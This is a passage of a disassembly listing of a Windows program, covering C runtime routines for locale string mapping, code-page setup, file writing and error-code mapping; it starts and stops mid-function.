loc_41C7C8: ; CODE XREF: sub_41C6D1+104�j
cmp eax, ecx
jnb short loc_41C7D7
cmp byte ptr [eax], 0Ah
jnz short loc_41C7D4
inc [ebp+arg_0]
loc_41C7D4: ; CODE XREF: sub_41C6D1+FE�j
inc eax
jmp short loc_41C7C8
; ---------------------------------------------------------------------------
loc_41C7D7: ; CODE XREF: sub_41C6D1+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_41C811
; ---------------------------------------------------------------------------
loc_41C7DD: ; CODE XREF: sub_41C6D1+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41C637
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41C804
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41C804
test ch, 4
jz short loc_41C807
loc_41C804: ; CODE XREF: sub_41C6D1+124�j
; sub_41C6D1+12C�j
mov eax, [edi+18h]
loc_41C807: ; CODE XREF: sub_41C6D1+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_41C811: ; CODE XREF: sub_41C6D1+10A�j
jz short loc_41C816
inc [ebp+arg_0]
loc_41C816: ; CODE XREF: sub_41C6D1+D9�j
; sub_41C6D1:loc_41C811�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_41C81C: ; CODE XREF: sub_41C6D1+A4�j
; sub_41C6D1+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41C824: ; CODE XREF: sub_41C6D1+3C�j
; sub_41C6D1+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C6D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C829 proc near ; CODE XREF: sub_417183+47�p
; sub_417183+74�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4228C8
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4C9110, edi
jnz short loc_41C89F
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_4228C0
mov esi, 100h
push esi
push edi
call ds:dword_4221B0 ; LCMapStringW
test eax, eax
jz short loc_41C87D
mov ds:dword_4C9110, ebx
jmp short loc_41C89F
; ---------------------------------------------------------------------------
loc_41C87D: ; CODE XREF: sub_41C829+4A�j
push edi
push edi
push ebx
push offset dword_4325D4
push esi
push edi
call ds:dword_4221AC ; LCMapStringA
test eax, eax
jz loc_41C9B7
mov ds:dword_4C9110, 2
loc_41C89F: ; CODE XREF: sub_41C829+2E�j
; sub_41C829+52�j
cmp [ebp+arg_C], edi
jle short loc_41C8B4
push [ebp+arg_C]
push [ebp+arg_8]
call sub_420586
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_41C8B4: ; CODE XREF: sub_41C829+79�j
mov eax, ds:dword_4C9110
cmp eax, 2
jnz short loc_41C8DB
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221AC ; LCMapStringA
jmp loc_41C9B9
; ---------------------------------------------------------------------------
loc_41C8DB: ; CODE XREF: sub_41C829+93�j
cmp eax, 1
jnz loc_41C9B7
cmp [ebp+arg_18], edi
jnz short loc_41C8F1
mov eax, ds:dword_4C912C
mov [ebp+arg_18], eax
loc_41C8F1: ; CODE XREF: sub_41C829+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_422134 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_41C9B7
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C94C
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_41C94C: ; CODE XREF: sub_41C829+10E�j
cmp [ebp+var_24], edi
jz short loc_41C9B7
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_422134 ; MultiByteToWideChar
test eax, eax
jz short loc_41C9B7
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221B0 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_41C9B7
test byte ptr [ebp+arg_4+1], 4
jz short loc_41C9CB
cmp [ebp+arg_14], edi
jz loc_41CA46
cmp esi, [ebp+arg_14]
jg short loc_41C9B7
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221B0 ; LCMapStringW
test eax, eax
jnz loc_41CA46
loc_41C9B7: ; CODE XREF: sub_41C829+66�j
; sub_41C829+B5�j ...
xor eax, eax
loc_41C9B9: ; CODE XREF: sub_41C829+AD�j
; sub_41C829+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C9CB: ; CODE XREF: sub_41C829+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41C9FF
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_41C9FF: ; CODE XREF: sub_41C829+1C2�j
cmp ebx, edi
jz short loc_41C9B7
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4221B0 ; LCMapStringW
test eax, eax
jz short loc_41C9B7
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_41CA26
push edi
push edi
jmp short loc_41CA2C
; ---------------------------------------------------------------------------
loc_41CA26: ; CODE XREF: sub_41C829+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41CA2C: ; CODE XREF: sub_41C829+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_422130 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_41C9B7
loc_41CA46: ; CODE XREF: sub_41C829+165�j
; sub_41C829+188�j
mov eax, esi
jmp loc_41C9B9
sub_41C829 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CA4D proc near ; CODE XREF: sub_41CE11+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41CBE6 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_4CA4C4
mov [ebp+arg_0], esi
jz loc_41CBDA
xor ebx, ebx
cmp esi, ebx
jz loc_41CBD0
xor edx, edx
mov eax, offset dword_431700
loc_41CA81: ; CODE XREF: sub_41CA4D+41�j
cmp [eax], esi
jz short loc_41CAF7
add eax, 30h
inc edx
cmp eax, offset dword_4317F0
jl short loc_41CA81
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_4221B4 ; GetCPInfo
cmp eax, 1
jnz loc_41CBC8
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4CA5E0
cmp [ebp+var_18], 1
mov ds:dword_4CA4C4, esi
rep stosd
stosb
mov ds:dword_4CA6E4, ebx
jbe loc_41CBB6
cmp [ebp+var_12], 0
jz loc_41CB8C
lea ecx, [ebp+var_11]
loc_41CAD4: ; CODE XREF: sub_41CA4D+139�j
mov dl, [ecx]
test dl, dl
jz loc_41CB8C
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41CAE5: ; CODE XREF: sub_41CA4D+A8�j
cmp eax, edx
ja loc_41CB80
or ds:byte_4CA5E1[eax], 4
inc eax
jmp short loc_41CAE5
; ---------------------------------------------------------------------------
loc_41CAF7: ; CODE XREF: sub_41CA4D+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4CA5E0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_431710[esi]
loc_41CB13: ; CODE XREF: sub_41CA4D+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41CB46
loc_41CB1A: ; CODE XREF: sub_41CA4D+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41CB46
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41CB3F
mov edx, [ebp+var_4]
mov dl, ds:byte_4316F8[edx]
loc_41CB34: ; CODE XREF: sub_41CA4D+F0�j
or ds:byte_4CA5E1[eax], dl
inc eax
cmp eax, edi
jbe short loc_41CB34
loc_41CB3F: ; CODE XREF: sub_41CA4D+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41CB1A
loc_41CB46: ; CODE XREF: sub_41CA4D+CB�j
; sub_41CA4D+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41CB13
mov eax, [ebp+arg_0]
mov ds:dword_4CA4DC, 1
push eax
mov ds:dword_4CA4C4, eax
call sub_41CC30
lea esi, dword_431704[esi]
mov edi, offset dword_4CA4D0
movsd
movsd
pop ecx
mov ds:dword_4CA6E4, eax
movsd
jmp short loc_41CBD5
; ---------------------------------------------------------------------------
loc_41CB80: ; CODE XREF: sub_41CA4D+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41CAD4
loc_41CB8C: ; CODE XREF: sub_41CA4D+7E�j
; sub_41CA4D+8B�j
push 1
pop eax
loc_41CB8F: ; CODE XREF: sub_41CA4D+14F�j
or ds:byte_4CA5E1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41CB8F
push esi
call sub_41CC30
pop ecx
mov ds:dword_4CA6E4, eax
mov ds:dword_4CA4DC, 1
jmp short loc_41CBBC
; ---------------------------------------------------------------------------
loc_41CBB6: ; CODE XREF: sub_41CA4D+74�j
mov ds:dword_4CA4DC, ebx
loc_41CBBC: ; CODE XREF: sub_41CA4D+167�j
xor eax, eax
mov edi, offset dword_4CA4D0
stosd
stosd
stosd
jmp short loc_41CBD5
; ---------------------------------------------------------------------------
loc_41CBC8: ; CODE XREF: sub_41CA4D+51�j
cmp ds:dword_4C9134, ebx
jz short loc_41CBDE
loc_41CBD0: ; CODE XREF: sub_41CA4D+27�j
call sub_41CC63
loc_41CBD5: ; CODE XREF: sub_41CA4D+131�j
; sub_41CA4D+179�j
call sub_41CC8C
loc_41CBDA: ; CODE XREF: sub_41CA4D+1D�j
xor eax, eax
jmp short loc_41CBE1
; ---------------------------------------------------------------------------
loc_41CBDE: ; CODE XREF: sub_41CA4D+181�j
or eax, 0FFFFFFFFh
loc_41CBE1: ; CODE XREF: sub_41CA4D+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CA4D endp
; =============== S U B R O U T I N E =======================================
sub_41CBE6 proc near ; CODE XREF: sub_41CA4D+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_4C9134, 0
cmp eax, 0FFFFFFFEh
jnz short loc_41CC06
mov ds:dword_4C9134, 1
jmp ds:dword_4221BC
; ---------------------------------------------------------------------------
loc_41CC06: ; CODE XREF: sub_41CBE6+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_41CC1B
mov ds:dword_4C9134, 1
jmp ds:dword_4221B8
; ---------------------------------------------------------------------------
loc_41CC1B: ; CODE XREF: sub_41CBE6+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_41CC2F
mov eax, ds:dword_4C912C
mov ds:dword_4C9134, 1
locret_41CC2F: ; CODE XREF: sub_41CBE6+38�j
retn
sub_41CBE6 endp
; =============== S U B R O U T I N E =======================================
sub_41CC30 proc near ; CODE XREF: sub_41CA4D+118�p
; sub_41CA4D+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_41CC5D
sub eax, 4
jz short loc_41CC57
sub eax, 0Dh
jz short loc_41CC51
dec eax
jz short loc_41CC4B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41CC4B: ; CODE XREF: sub_41CC30+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_41CC51: ; CODE XREF: sub_41CC30+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_41CC57: ; CODE XREF: sub_41CC30+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_41CC5D: ; CODE XREF: sub_41CC30+9�j
mov eax, 411h
retn
sub_41CC30 endp
; =============== S U B R O U T I N E =======================================
sub_41CC63 proc near ; CODE XREF: sub_41CA4D:loc_41CBD0�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4CA5E0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4CA4D0
mov ds:dword_4CA4C4, eax
mov ds:dword_4CA4DC, eax
mov ds:dword_4CA6E4, eax
stosd
stosd
stosd
pop edi
retn
sub_41CC63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC8C proc near ; CODE XREF: sub_41CA4D:loc_41CBD5�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_4CA4C4
call ds:dword_4221B4 ; GetCPInfo
cmp eax, 1
jnz loc_41CDC5
xor eax, eax
mov esi, 100h
loc_41CCB6: ; CODE XREF: sub_41CC8C+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_41CCB6
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_41CD07
push ebx
push edi
lea edx, [ebp+var_D]
loc_41CCD5: ; CODE XREF: sub_41CC8C+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_41CCFC
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_41CCFC: ; CODE XREF: sub_41CC8C+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_41CCD5
pop edi
pop ebx
loc_41CD07: ; CODE XREF: sub_41CC8C+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_4CA6E4
push ds:dword_4CA4C4
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_41DC83
push 0
lea eax, [ebp+var_214]
push ds:dword_4CA4C4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_4CA6E4
call sub_41C829
push 0
lea eax, [ebp+var_314]
push ds:dword_4CA4C4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_4CA6E4
call sub_41C829
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_41CD82: ; CODE XREF: sub_41CC8C+135�j
mov dx, [ecx]
test dl, 1
jz short loc_41CDA0
or ds:byte_4CA5E1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_41CD98: ; CODE XREF: sub_41CC8C+127�j
mov ds:byte_4CA4E0[eax], dl
jmp short loc_41CDBC
; ---------------------------------------------------------------------------
loc_41CDA0: ; CODE XREF: sub_41CC8C+FC�j
test dl, 2
jz short loc_41CDB5
or ds:byte_4CA5E1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41CD98
; ---------------------------------------------------------------------------
loc_41CDB5: ; CODE XREF: sub_41CC8C+117�j
and ds:byte_4CA4E0[eax], 0
loc_41CDBC: ; CODE XREF: sub_41CC8C+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41CD82
jmp short loc_41CE0E
; ---------------------------------------------------------------------------
loc_41CDC5: ; CODE XREF: sub_41CC8C+1D�j
xor eax, eax
mov esi, 100h
loc_41CDCC: ; CODE XREF: sub_41CC8C+180�j
cmp eax, 41h
jb short loc_41CDEA
cmp eax, 5Ah
ja short loc_41CDEA
or ds:byte_4CA5E1[eax], 10h
mov cl, al
add cl, 20h
loc_41CDE2: ; CODE XREF: sub_41CC8C+174�j
mov ds:byte_4CA4E0[eax], cl
jmp short loc_41CE09
; ---------------------------------------------------------------------------
loc_41CDEA: ; CODE XREF: sub_41CC8C+143�j
; sub_41CC8C+148�j
cmp eax, 61h
jb short loc_41CE02
cmp eax, 7Ah
ja short loc_41CE02
or ds:byte_4CA5E1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41CDE2
; ---------------------------------------------------------------------------
loc_41CE02: ; CODE XREF: sub_41CC8C+161�j
; sub_41CC8C+166�j
and ds:byte_4CA4E0[eax], 0
loc_41CE09: ; CODE XREF: sub_41CC8C+15C�j
inc eax
cmp eax, esi
jb short loc_41CDCC
loc_41CE0E: ; CODE XREF: sub_41CC8C+137�j
pop esi
leave
retn
sub_41CC8C endp
; =============== S U B R O U T I N E =======================================
sub_41CE11 proc near ; CODE XREF: sub_41D24F+9�p
; sub_41D2A7+D�p ...
cmp ds:dword_4CA714, 0
jnz short locret_41CE2C
push 0FFFFFFFDh
call sub_41CA4D
pop ecx
mov ds:dword_4CA714, 1
locret_41CE2C: ; CODE XREF: sub_41CE11+7�j
retn
sub_41CE11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE2D proc near ; CODE XREF: sub_4173D8+2B�p
; sub_4173D8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_4CA4DC, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41CE51
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_416D30
add esp, 0Ch
jmp short loc_41CEB4
; ---------------------------------------------------------------------------
loc_41CE51: ; CODE XREF: sub_41CE2D+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41CE96
mov ecx, [ebp+arg_4]
loc_41CE5C: ; CODE XREF: sub_41CE2D+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test ds:byte_4CA5E1[esi], 4
mov [edi], al
jz short loc_41CE80
inc edi
inc ecx
test edx, edx
jz short loc_41CE8C
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41CE92
jmp short loc_41CE86
; ---------------------------------------------------------------------------
loc_41CE80: ; CODE XREF: sub_41CE2D+3E�j
inc edi
inc ecx
test al, al
jz short loc_41CE96
loc_41CE86: ; CODE XREF: sub_41CE2D+51�j
test edx, edx
jnz short loc_41CE5C
jmp short loc_41CE96
; ---------------------------------------------------------------------------
loc_41CE8C: ; CODE XREF: sub_41CE2D+44�j
and byte ptr [edi-1], 0
jmp short loc_41CE96
; ---------------------------------------------------------------------------
loc_41CE92: ; CODE XREF: sub_41CE2D+4F�j
and byte ptr [edi-2], 0
loc_41CE96: ; CODE XREF: sub_41CE2D+2A�j
; sub_41CE2D+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41CEB1
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41CEB1: ; CODE XREF: sub_41CE2D+6F�j
mov eax, [ebp+arg_0]
loc_41CEB4: ; CODE XREF: sub_41CE2D+22�j
pop edi
pop ebp
retn
sub_41CE2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEB7 proc near ; CODE XREF: sub_41780F+A2�p
; sub_417E43+95�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, ds:dword_4CA4C0
push esi
push edi
jnb loc_41D04B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:4CA3C0h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41D04B
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41CF08
loc_41CF01: ; CODE XREF: sub_41CEB7+177�j
xor eax, eax
jmp loc_41D05F
; ---------------------------------------------------------------------------
loc_41CF08: ; CODE XREF: sub_41CEB7+48�j
test al, 20h
jz short loc_41CF18
push 2
push edi
push ecx
call sub_41C637
add esp, 0Ch
loc_41CF18: ; CODE XREF: sub_41CEB7+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41CFE7
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41D01F
loc_41CF38: ; CODE XREF: sub_41CEB7+F5�j
lea eax, [ebp+var_414]
loc_41CF3E: ; CODE XREF: sub_41CEB7+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41CF72
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41CF5D
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41CF5D: ; CODE XREF: sub_41CEB7+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41CF3E
loc_41CF72: ; CODE XREF: sub_41CEB7+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_4220B0 ; WriteFile
test eax, eax
jz short loc_41CFDC
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41CFAE
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41CF38
loc_41CFAE: ; CODE XREF: sub_41CEB7+EA�j
; sub_41CEB7+12E�j
xor edi, edi
loc_41CFB0: ; CODE XREF: sub_41CEB7+150�j
; sub_41CEB7+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41D046
cmp [ebp+arg_0], edi
jz short loc_41D01F
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41D014
mov ds:dword_4C9084, 9
mov ds:dword_4C9088, eax
jmp loc_41D05C
; ---------------------------------------------------------------------------
loc_41CFDC: ; CODE XREF: sub_41CEB7+E0�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41CFAE
; ---------------------------------------------------------------------------
loc_41CFE7: ; CODE XREF: sub_41CEB7+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_4220B0 ; WriteFile
test eax, eax
jz short loc_41D009
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41CFB0
; ---------------------------------------------------------------------------
loc_41D009: ; CODE XREF: sub_41CEB7+145�j
call ds:dword_42206C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41CFB0
; ---------------------------------------------------------------------------
loc_41D014: ; CODE XREF: sub_41CEB7+10F�j
push [ebp+arg_0]
call sub_41D064
pop ecx
jmp short loc_41D05C
; ---------------------------------------------------------------------------
loc_41D01F: ; CODE XREF: sub_41CEB7+7B�j
; sub_41CEB7+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41D034
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41CF01
loc_41D034: ; CODE XREF: sub_41CEB7+16F�j
mov ds:dword_4C9084, 1Ch
mov ds:dword_4C9088, edi
jmp short loc_41D05C
; ---------------------------------------------------------------------------
loc_41D046: ; CODE XREF: sub_41CEB7+FE�j
sub eax, [ebp+var_10]
jmp short loc_41D05F
; ---------------------------------------------------------------------------
loc_41D04B: ; CODE XREF: sub_41CEB7+15�j
; sub_41CEB7+37�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
loc_41D05C: ; CODE XREF: sub_41CEB7+120�j
; sub_41CEB7+166�j ...
or eax, 0FFFFFFFFh
loc_41D05F: ; CODE XREF: sub_41CEB7+4C�j
; sub_41CEB7+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CEB7 endp
; =============== S U B R O U T I N E =======================================
sub_41D064 proc near ; CODE XREF: sub_417919+16�p
; sub_417CDA+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov ds:dword_4C9088, ecx
mov eax, offset dword_4317F0
loc_41D075: ; CODE XREF: sub_41D064+1E�j
cmp ecx, [eax]
jz short loc_41D099
add eax, 8
inc edx
cmp eax, offset dword_431958
jl short loc_41D075
cmp ecx, 13h
jb short loc_41D0A6
cmp ecx, 24h
ja short loc_41D0A6
mov ds:dword_4C9084, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41D099: ; CODE XREF: sub_41D064+13�j
mov eax, ds:dword_4317F4[edx*8]
mov ds:dword_4C9084, eax
retn
; ---------------------------------------------------------------------------
loc_41D0A6: ; CODE XREF: sub_41D064+23�j
; sub_41D064+28�j
cmp ecx, 0BCh
jb short loc_41D0C0
cmp ecx, 0CAh
mov ds:dword_4C9084, 8
jbe short locret_41D0CA
loc_41D0C0: ; CODE XREF: sub_41D064+48�j
mov ds:dword_4C9084, 16h
locret_41D0CA: ; CODE XREF: sub_41D064+5A�j
retn
sub_41D064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0CB proc near ; CODE XREF: _0:00417DE7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41D20C
test eax, eax
pop ecx
jz loc_41D200
mov ebx, [eax+8]
test ebx, ebx
jz loc_41D200
cmp ebx, 5
jnz short loc_41D0FC
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41D209
; ---------------------------------------------------------------------------
loc_41D0FC: ; CODE XREF: sub_41D0CB+23�j
cmp ebx, 1
jz loc_41D1FB
mov ecx, ds:dword_4C9138
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4C9138, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41D1EB
mov ecx, ds:dword_4319D0
mov edx, ds:dword_4319D4
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41D14B
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:431960h[esi*4]
loc_41D142: ; CODE XREF: sub_41D0CB+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41D142
loc_41D14B: ; CODE XREF: sub_41D0CB+69�j
mov eax, [eax]
mov esi, ds:dword_4319DC
cmp eax, 0C000008Eh
jnz short loc_41D166
mov ds:dword_4319DC, 83h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D166: ; CODE XREF: sub_41D0CB+8D�j
cmp eax, 0C0000090h
jnz short loc_41D179
mov ds:dword_4319DC, 81h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D179: ; CODE XREF: sub_41D0CB+A0�j
cmp eax, 0C0000091h
jnz short loc_41D18C
mov ds:dword_4319DC, 84h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D18C: ; CODE XREF: sub_41D0CB+B3�j
cmp eax, 0C0000093h
jnz short loc_41D19F
mov ds:dword_4319DC, 85h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D19F: ; CODE XREF: sub_41D0CB+C6�j
cmp eax, 0C000008Dh
jnz short loc_41D1B2
mov ds:dword_4319DC, 82h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D1B2: ; CODE XREF: sub_41D0CB+D9�j
cmp eax, 0C000008Fh
jnz short loc_41D1C5
mov ds:dword_4319DC, 86h
jmp short loc_41D1D6
; ---------------------------------------------------------------------------
loc_41D1C5: ; CODE XREF: sub_41D0CB+EC�j
cmp eax, 0C0000092h
jnz short loc_41D1D6
mov ds:dword_4319DC, 8Ah
loc_41D1D6: ; CODE XREF: sub_41D0CB+99�j
